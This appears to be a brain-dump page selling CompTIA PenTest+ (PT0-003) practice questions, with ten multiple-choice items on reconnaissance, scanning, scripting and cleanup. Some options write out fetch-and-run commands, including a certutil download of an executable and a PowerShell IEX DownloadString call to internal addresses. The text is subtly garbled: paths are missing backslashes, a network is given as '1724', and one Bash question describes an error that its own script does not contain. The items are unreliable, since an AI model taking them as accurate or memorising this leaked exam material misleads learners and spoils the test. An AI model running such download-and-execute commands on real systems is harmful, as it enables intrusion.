CompTIA PT0-003 CompTIA PenTest+ Exam Online Training
CompTIA PT0-003 Online Training
The questions for PT0-003 were last updated at Feb 21,2025.
- Exam Code: PT0-003
- Exam Name: CompTIA PenTest+ Exam
- Certification Provider: CompTIA
- Latest update: Feb 21,2025
During a penetration test, the tester identifies several unused services that are listening on all targeted internal laptops.
Which of the following technical controls should the tester recommend to reduce the risk of compromise?
- A . Multifactor authentication
- B . Patch management
- C . System hardening
- D . Network segmentation
A penetration tester writes the following script to enumerate a 1724 network:
1 #!/bin/bash
2 for i in {1..254}; do
3 ping -c1 192.168.1.$i
4 done
The tester executes the script, but it fails with the following error:
-bash: syntax error near unexpected token `ping’
Which of the following should the tester do to fix the error?
- A . Add do after line 2.
- B . Replace {1..254} with $(seq 1 254).
- C . Replace bash with tsh.
- D . Replace $i with ${i}.
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access.
Which of the following commands should the penetration tester use?
- A . powershell.exe impo C:toolsfoo.ps1
- B . certutil.exe -f https://192.168.0.1/foo.exe bad.exe
- C . powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")
- D . rundll32.exe c:pathfoo.dll,functName
During a vulnerability assessment, a penetration tester configures the scanner sensor and performs the initial vulnerability scanning under the client’s internal network. The tester later discusses the results with the client, but the client does not accept the results. The client indicates the host and assets that were within scope are not included in the vulnerability scan results.
Which of the following should the tester have done?
- A . Rechecked the scanner configuration.
- B . Performed a discovery scan.
- C . Used a different scan engine.
- D . Configured all the TCP ports on the scan.
Which of the following describes the process of determining why a vulnerability scanner is not providing results?
- A . Root cause analysis
- B . Secure distribution
- C . Peer review
- D . Goal reprioritization
During a security audit, a penetration tester wants to run a process to gather information about a target network’s domain structure and associated IP addresses.
Which of the following tools should the tester use?
- A . Dnsenum
- B . Nmap
- C . Netcat
- D . Wireshark
During an external penetration test, a tester receives the following output from a tool:
test.comptia.org
info.comptia.org
vpn.comptia.org
exam.comptia.org
Which of the following commands did the tester most likely run to get these results?
- A . nslookup -type=SOA comptia.org
- B . amass enum -passive -d comptia.org
- C . nmap -Pn -sV -vv -A comptia.org
- D . shodan host comptia.org
A penetration tester is developing the rules of engagement for a potential client.
Which of the following would most likely be a function of the rules of engagement?
- A . Testing window
- B . Terms of service
- C . Authorization letter
- D . Shared responsibilities
A penetration tester needs to complete cleanup activities from the testing lead.
Which of the following should the tester do to validate that reverse shell payloads are no longer running?
- A . Run scripts to terminate the implant on affected hosts.
- B . Spin down the C2 listeners.
- C . Restore the firewall settings of the original affected hosts.
- D . Exit from C2 listener active sessions.
A penetration testing team wants to conduct DNS lookups for a set of targets provided by the client.
The team crafts a Bash script for this task. However, they find a minor error in one line of the script:
1 #!/bin/bash
2 for i in $(cat example.txt); do
3 curl $i
4 done
Which of the following changes should the team make to line 3 of the script?
- A . resolvconf $i
- B . rndc $i
- C . systemd-resolve $i
- D . host $i
Latest PT0-003 Dumps Valid Version with 131 Q&As
Latest And Valid Q&A | Instant Download | Once Fail, Full Refund
